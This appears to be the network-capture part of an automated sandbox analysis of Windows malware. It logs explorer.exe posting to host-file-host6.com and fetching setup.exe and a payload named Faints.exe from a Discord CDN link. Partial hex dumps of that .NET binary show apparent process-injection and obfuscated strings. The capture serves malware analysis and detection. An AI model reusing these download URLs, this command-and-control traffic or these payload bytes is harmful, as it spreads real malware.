                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$0'ttttttWt]tbtetVtt}otttttStutftutatutRichttPELF`y@x`D`w@.text `.dataJ@.rsrcD`F@@.relocP@B


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  6192.168.2.749763188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:12.879326105 CET1474OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://lcapgjmve.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 142
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:12.994435072 CET1475INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:12 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  7192.168.2.749764188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:13.100102901 CET1475OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://kbmxn.net/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 348
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:13.207979918 CET1476INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:13 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 93 d6 10 49 3a 40 a8 e8 dd e1 fd 5f f7 4d 91 71 b2 42 4a 84 4b f4 f1 2c 89 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 2cI:82OI:@_MqBJK,0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  8192.168.2.749765216.128.137.3180C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:13.390058041 CET1477OUTGET /setup.exe%09 HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Host: 216.128.137.31
                                                                                                                                                                                                  Nov 18, 2021 10:30:13.526695967 CET1477INHTTP/1.1 308 Permanent Redirect
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Location: https://216.128.137.31/setup.exe%09
                                                                                                                                                                                                  Server: Caddy
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:13 GMT
                                                                                                                                                                                                  Content-Length: 0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  9192.168.2.749770188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:15.884695053 CET1481OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://aykdwcs.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 232
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:15.991425991 CET1481INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:15 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  0192.168.2.749779162.159.135.233443C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC0OUTGET /attachments/825918003454935051/909883200657031198/Faints.exe HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Host: cdn.discordapp.com
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:21 GMT
                                                                                                                                                                                                  Content-Type: application/x-msdos-program
                                                                                                                                                                                                  Content-Length: 399360
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  CF-Ray: 6b002dfcfd3e4a74-FRA
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Age: 224247
                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                  Content-Disposition: attachment;%20filename=Faints.exe
                                                                                                                                                                                                  ETag: "5e34695c9f46f1e69ce731d3b7359c88"
                                                                                                                                                                                                  Expires: Fri, 18 Nov 2022 09:30:21 GMT
                                                                                                                                                                                                  Last-Modified: Mon, 15 Nov 2021 19:10:59 GMT
                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                  x-goog-generation: 1637003459887101
                                                                                                                                                                                                  x-goog-hash: crc32c=7UjwWA==
                                                                                                                                                                                                  x-goog-hash: md5=XjRpXJ9G8eac5zHTtzWciA==
                                                                                                                                                                                                  x-goog-metageneration: 1
                                                                                                                                                                                                  x-goog-storage-class: STANDARD
                                                                                                                                                                                                  x-goog-stored-content-encoding: identity
                                                                                                                                                                                                  x-goog-stored-content-length: 399360
                                                                                                                                                                                                  X-GUploader-UploadID: ADPycds_83M5mZA1oDvKnIw2UcSBMtyG2F2y0IgSgRljwNJNz7oImjBlP6j0NvCFGGLTM_oIAoJ7wuI6g30LLsON_h4QVyATxA
                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 58 44 51 4e 6f 30 69 4e 54 32 71 32 39 62 6e 56 73 68 4e 6a 35 66 67 34 5a 4a 58 4c 57 68 45 39 62 59 4e 75 32 30 72 5a 6a 67 72 48 38 6e 78 58 4f 4a 4c 58 78 68 25 32 42 73 62 6d 6a 25 32 46 46 77 6d 30 62 68 42 47 35 50 7a 50 31 31 76 4f 36 78 45 35 61 7a 33 52 76 50 39 59 55 63 67 53 51 53 64 43 35 74 68 42 76 49 4d 76 35 6f 68 53 78 4c 4e 38 77 67 4b 66 4e 43 70 46 71 79 36 6c 78 33 6b 43 35 33 79 63 68 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                                                                                                                                  Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XDQNo0iNT2q29bnVshNj5fg4ZJXLWhE9bYNu20rZjgrH8nxXOJLXxh%2Bsbmj%2FFwm0bhBG5PzP11vO6xE5az3RvP9YUcgSQSdC5thBvIMv5ohSxLN8wgKfNCpFqy6lx3kC53ychg%3D%3D"}],"group":"cf-nel","max_age":60
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 29 ee b1 80 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 10 06 00 00 06 00 00 00 00 00 00 fe 2d 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL)0- @@ @
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC2INData Raw: 00 01 00 00 61 00 30 97 00 06 24 00 00 01 00 00 00 00 a2 a2 00 06 01 00 00 01 1e 02 6f 25 00 00 0a 2a 1a 7e 06 00 00 04 2a 00 32 28 10 00 00 06 02 80 06 00 00 04 2a 00 00 00 1e 02 7b 07 00 00 04 2a 22 02 03 7d 07 00 00 04 2a 00 00 00 13 30 0d 00 a9 00 00 00 00 00 00 00 02 28 05 00 00 0a 02 7e 09 00 00 04 3a 24 00 00 00 16 d0 04 00 00 1b 28 0e 00 00 0a d0 09 00 00 02 28 0e 00 00 0a 28 15 00 00 0a 28 26 00 00 0a 80 09 00 00 04 7e 09 00 00 04 7b 27 00 00 0a 7e 09 00 00 04 7e 08 00 00 04 3a 3a 00 00 00 18 72 6b 0a 00 70 14 d0 09 00 00 02 28 0e 00 00 0a 18 8d 26 00 00 01 25 16 17 14 28 28 00 00 0a a2 25 17 16 14 28 28 00 00 0a a2 28 29 00 00 0a 28 2a 00 00 0a 80 08 00 00 04 7e 08 00 00 04 7b 2b 00 00 0a 7e 08 00 00 04 02 03 6f 2c 00 00 0a 6f 2d 00 00 0a 28 15
                                                                                                                                                                                                  Data Ascii: a0$o%*~*2(*{*"}*0(~:$((((&~{'~~::rkp(&%((%((()(*~{+~o,o-(
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC4INData Raw: 1b 00 00 06 13 06 12 07 fe 15 21 00 00 02 12 10 fe 15 1b 00 00 02 12 10 20 1b 00 10 00 7d 15 00 00 04 11 10 13 08 17 8d 01 00 00 01 25 16 72 8c 00 00 70 16 28 08 00 00 06 a2 73 1b 00 00 06 13 09 02 7b 01 00 00 04 6f 51 00 00 06 25 13 12 39 09 00 00 00 11 12 8e 69 3a 09 00 00 00 16 e0 13 11 38 0b 00 00 00 11 12 16 8f 0d 00 00 01 e0 13 11 11 11 28 07 00 00 0a 13 05 11 11 0b 11 11 07 7b 19 00 00 04 e0 58 0c 14 13 12 07 7b 18 00 00 04 20 4d 5a 00 00 40 10 00 00 00 08 7b 1b 00 00 04 20 50 45 00 00 3b 02 00 00 00 16 2a 08 7c 1d 00 00 04 7b 1e 00 00 04 20 0b 01 00 00 3b 02 00 00 00 16 2a 02 7b 01 00 00 04 6f 51 00 00 06 20 98 03 00 00 18 9c 12 0a fe 15 22 00 00 02 12 0a 11 0a 8c 22 00 00 02 28 08 00 00 0a 7d 2a 00 00 04 12 0a 16 7d 36 00 00 04 08 7c 1d 00 00 04
                                                                                                                                                                                                  Data Ascii: ! }%rp(s{oQ%9i:8({X{ MZ@{ PE;*|{ ;*{oQ ""(}*}6|
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC5INData Raw: 00 00 11 15 17 58 13 15 11 15 20 43 69 08 00 3f c6 ff ff ff 11 06 72 c2 04 00 70 16 28 08 00 00 06 6f 07 00 00 2b 11 07 7b 26 00 00 04 11 08 7b 16 00 00 04 6e 1e 6a 58 28 09 00 00 0a 11 0b 1a 7e 06 00 00 0a 6f 25 00 00 06 3a 6b 00 00 00 11 0b 28 12 00 00 0a 11 06 72 b5 01 00 70 16 28 08 00 00 06 6f 02 00 00 2b 11 07 7b 26 00 00 04 15 6f 29 00 00 06 39 40 00 00 00 11 06 72 4e 02 00 70 16 28 08 00 00 06 6f 03 00 00 2b 11 07 7b 26 00 00 04 6f 2d 00 00 06 26 11 06 72 4e 02 00 70 16 28 08 00 00 06 6f 03 00 00 2b 11 07 7b 27 00 00 04 6f 2d 00 00 06 26 16 2a 11 0b 28 12 00 00 0a 08 7c 1d 00 00 04 7b 1f 00 00 04 13 0f 12 08 11 0c 11 0f 6e 58 6d 7d 17 00 00 04 06 39 8a 00 00 00 11 06 72 9d 06 00 70 16 28 08 00 00 06 6f 09 00 00 2b 11 07 7b 27 00 00 04 12 08 e0 6f
                                                                                                                                                                                                  Data Ascii: X Ci?rp(o+{&{njX(~o%:k(rp(o+{&o)9@rNp(o+{&o-&rNp(o+{'o-&*(|{nXm}9rp(o+{'o
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC6INData Raw: 01 05 01 05 00 14 00 1f 00 02 01 00 00 4a 01 00 00 09 00 15 00 20 00 02 01 00 00 63 01 00 00 09 00 15 00 24 00 02 01 00 00 6e 01 00 00 09 00 15 00 28 00 02 01 00 00 7c 01 00 00 09 00 15 00 2c 00 02 01 00 00 8e 01 00 00 09 00 15 00 30 00 02 01 00 00 95 01 00 00 09 00 15 00 34 00 02 01 00 00 a2 01 00 00 09 00 15 00 38 00 02 01 00 00 ad 01 00 00 09 00 15 00 3c 00 02 01 00 00 b4 01 00 00 09 00 15 00 40 00 02 01 00 00 cb 01 00 00 09 00 15 00 44 00 02 01 00 00 d9 01 00 00 09 00 15 00 48 00 02 01 00 00 e6 01 00 00 09 00 15 00 4c 00 11 01 10 00 f1 01 05 01 0d 00 15 00 50 00 11 01 10 00 10 02 34 00 0d 00 18 00 50 00 11 01 10 00 26 02 37 02 0d 00 1a 00 50 00 11 01 10 00 46 02 37 02 0d 00 1b 00 50 00 11 01 10 00 56 02 6a 00 0d 00 1e 00 50 00 11 01 10 00 64 02 79 02
                                                                                                                                                                                                  Data Ascii: J c$n(|,048<@DHLP4P&7PF7PVjPdy
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC8INData Raw: 00 00 00 00 03 00 c6 01 6a 03 8f 04 4c 00 00 00 00 00 03 00 c6 01 3e 09 a5 04 59 00 00 00 00 00 03 00 c6 01 75 09 c1 04 67 00 00 00 00 00 03 00 86 18 20 03 cc 00 6b 00 00 00 00 00 03 00 c6 01 6a 03 d0 04 6d 00 00 00 00 00 03 00 c6 01 3e 09 d8 04 70 00 00 00 00 00 03 00 c6 01 75 09 62 04 74 00 00 00 00 00 03 00 86 18 20 03 cc 00 76 00 00 00 00 00 03 00 c6 01 6a 03 d0 04 78 00 00 00 00 00 03 00 c6 01 3e 09 d8 04 7b 00 00 00 00 00 03 00 c6 01 75 09 62 04 7f 00 00 00 00 00 03 00 86 18 20 03 cc 00 81 00 00 00 00 00 03 00 c6 01 6a 03 e6 04 83 00 00 00 00 00 03 00 c6 01 3e 09 ec 04 85 00 00 00 00 00 03 00 c6 01 75 09 f8 04 89 00 00 00 00 00 03 00 86 18 20 03 cc 00 8a 00 00 00 00 00 03 00 c6 01 6a 03 ff 04 8c 00 00 00 00 00 03 00 c6 01 3e 09 0b 05 92 00 00 00 00
                                                                                                                                                                                                  Data Ascii: jL>Yug kjm>pubt vjx>{ub j>u j>
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC9INData Raw: 0b 00 00 05 00 39 0b 00 00 06 00 48 0b 00 00 07 00 65 09 00 00 08 00 6e 09 00 00 01 00 19 0b 00 00 02 00 2e 0b 00 00 03 00 7f 09 00 00 01 00 ec 06 00 00 02 00 fd 0a 00 20 01 00 ec 0a 00 20 01 00 ec 0a 00 00 02 00 65 09 00 00 03 00 6e 09 00 00 01 00 7f 09 00 00 01 00 61 08 00 00 02 00 e4 07 00 00 01 00 65 09 00 00 02 00 6e 09 00 00 01 00 7f 09 00 00 01 00 50 0b 00 00 02 00 d2 04 00 00 01 00 52 0b 00 00 02 00 57 0b 00 00 01 00 52 0b 00 00 02 00 57 0b 00 00 03 00 65 09 00 00 04 00 6e 09 00 00 01 00 7f 09 00 00 01 00 61 08 00 00 01 00 d5 0c 31 00 20 03 b0 00 0c 00 20 03 cc 00 0c 00 6a 03 d2 00 59 00 20 03 d7 00 09 00 20 03 d7 00 51 00 df 03 10 01 51 00 e4 03 13 01 89 00 f8 03 19 01 51 00 e4 03 1e 01 91 00 20 04 28 01 51 00 33 04 2c 01 99 00 52 04 3c 01 51 00
                                                                                                                                                                                                  Data Ascii: 9Hen. enaenPRWRWena1 jY QQQ (Q3,R<Q
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC10INData Raw: 19 00 0e 00 1a 00 0e 00 25 00 24 00 00 00 04 00 39 00 d9 08 38 00 23 01 38 00 32 01 38 00 37 01 38 00 41 01 38 00 46 01 38 00 4b 01 38 00 50 01 38 00 66 01 38 00 7e 01 38 00 83 01 38 00 4a 02 38 00 4f 02 00 46 61 69 6e 74 73 00 46 61 69 6e 74 73 2e 65 78 65 00 3c 4d 6f 64 75 6c 65 3e 00 50 72 6f 63 63 65 73 6f 72 57 72 61 70 70 65 72 4d 61 6e 61 67 65 72 00 46 61 69 6e 74 73 2e 4d 61 6e 61 67 65 72 73 00 4f 62 6a 65 63 74 00 53 79 73 74 65 6d 00 6d 73 63 6f 72 6c 69 62 00 53 79 73 74 65 6d 44 69 63 43 6c 61 73 73 00 46 61 69 6e 74 73 2e 43 6c 61 73 73 65 73 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 32 5f 30 00 53 63 68 65 6d 61 44 69 63 43 6c 61 73 73 00 50 72 69 6e 74 65 72 53 65 72 76 65 72 53 65 72 69 61 6c 69 7a 65 72 00 46 61 69 6e 74 73
                                                                                                                                                                                                  Data Ascii: %$98#82878A8F8K8P8f8~88J8OFaintsFaints.exe<Module>ProccesorWrapperManagerFaints.ManagersObjectSystemmscorlibSystemDicClassFaints.Classes<>c__DisplayClass2_0SchemaDicClassPrinterServerSerializerFaints
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC12INData Raw: 63 72 6f 73 6f 66 74 2e 43 53 68 61 72 70 2e 52 75 6e 74 69 6d 65 42 69 6e 64 65 72 00 4d 69 63 72 6f 73 6f 66 74 2e 43 53 68 61 72 70 00 43 6f 6e 76 65 72 74 00 43 61 6c 6c 53 69 74 65 42 69 6e 64 65 72 00 53 79 73 74 65 6d 2e 52 75 6e 74 69 6d 65 2e 43 6f 6d 70 69 6c 65 72 53 65 72 76 69 63 65 73 00 53 79 73 74 65 6d 2e 43 6f 72 65 00 43 53 68 61 72 70 42 69 6e 64 65 72 46 6c 61 67 73 00 43 61 6c 6c 53 69 74 65 60 31 00 46 75 6e 63 60 33 00 43 61 6c 6c 53 69 74 65 00 43 72 65 61 74 65 00 54 61 72 67 65 74 00 54 6f 43 68 61 72 41 72 72 61 79 00 43 68 61 72 00 46 69 6c 6c 41 6c 67 6f 00 67 65 74 5f 4c 65 6e 67 74 68 00 46 72 6f 6d 42 61 73 65 36 34 43 68 61 72 41 72 72 61 79 00 45 6e 63 6f 64 69 6e 67 00 53 79 73 74 65 6d 2e 54 65 78 74 00 67 65 74 5f 55
                                                                                                                                                                                                  Data Ascii: crosoft.CSharp.RuntimeBinderMicrosoft.CSharpConvertCallSiteBinderSystem.Runtime.CompilerServicesSystem.CoreCSharpBinderFlagsCallSite`1Func`3CallSiteCreateTargetToCharArrayCharFillAlgoget_LengthFromBase64CharArrayEncodingSystem.Textget_U
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC13INData Raw: 6c 65 73 00 64 77 43 72 65 61 74 69 6f 6e 46 6c 61 67 73 00 6c 70 45 6e 76 69 72 6f 6e 6d 65 6e 74 00 6c 70 43 75 72 72 65 6e 74 44 69 72 65 63 74 6f 72 79 00 6c 70 53 74 61 72 74 75 70 49 6e 66 6f 00 6c 70 50 72 6f 63 65 73 74 6e 65 6d 67 65 53 68 74 61 50 6c 61 72 65 74 69 4c 65 74 61 6c 70 6d 65 54 69 72 55 6d 65 74 73 79 53 37 34 32 31 33 00 68 4e 65 77 54 6f 6b 65 6e 00 68 54 68 72 65 61 64 00 70 43 6f 6e 74 65 78 74 00 63 6f 6e 74 00 64 65 66 00 70 72 65 64 00 50 72 6f 63 65 73 73 48 61 6e 64 6c 65 00 42 61 73 65 41 64 64 72 65 73 73 00 5a 65 72 6f 42 69 74 73 00 52 65 67 69 6f 6e 53 69 7a 65 00 41 6c 6c 6f 63 61 74 69 6f 6e 54 79 70 65 00 50 72 6f 74 65 63 74 00 76 00 68 57 6e 64 00 6e 43 6d 64 53 68 6f 77 00 6d 5f 42 72 6f 61 64 63 61 73 74 65 72
                                                                                                                                                                                                  Data Ascii: lesdwCreationFlagslpEnvironmentlpCurrentDirectorylpStartupInfolpProcestnemgeShtaPlaretiLetalpmeTirUmetsyS74213hNewTokenhThreadpContextcontdefpredProcessHandleBaseAddressZeroBitsRegionSizeAllocationTypeProtectvhWndnCmdShowm_Broadcaster
                                                                                                                                                                                                  2021-11-18 09:30:21 UTC14INData Raw: 00 38 00 73 00 4c 00 77 00 38 00 2f 00 50 00 79 00 63 00 30 00 47 00 7a 00 6b 00 36 00 50 00 33 00 45 00 41 00 48 00 51 00 35 00 37 00 44 00 53 00 59 00 58 00 43 00 7a 00 41 00 36 00 4e 00 41 00 6f 00 72 00 4f 00 44 00 63 00 6b 00 54 00 6e 00 45 00 3d 00 00 80 97 4a 00 63 00 78 00 45 00 65 00 67 00 61 00 73 00 73 00 65 00 4d 00 6e 00 6f 00 73 00 69 00 6f 00 50 00 71 00 6d 00 73 00 4d 00 6c 00 65 00 64 00 6f 00 4d 00 65 00 63 00 69 00 76 00 72 00 65 00 53 00 6d 00 65 00 74 00 73 00 79 00 53 00 38 00 30 00 38 00 39 00 37 00 51 00 73 00 77 00 4f 00 6a 00 51 00 77 00 41 00 54 00 34 00 34 00 43 00 79 00 45 00 67 00 4d 00 77 00 73 00 63 00 45 00 54 00 52 00 35 00 4e 00 79 00 6b 00 51 00 4f 00 31 00 74 00 2b 00 00 80 87 49 00 63 00 78 00 45 00 65 00 67 00 61 00
                                                                                                                                                                                                  Data Ascii: 8sLw8/Pyc0Gzk6P3EAHQ57DSYXCzA6NAorODckTnE=JcxEegasseMnosioPqmsMledoMecivreSmetsyS80897QswOjQwAT44CyEgMwscETR5NykQO1t+IcxEega
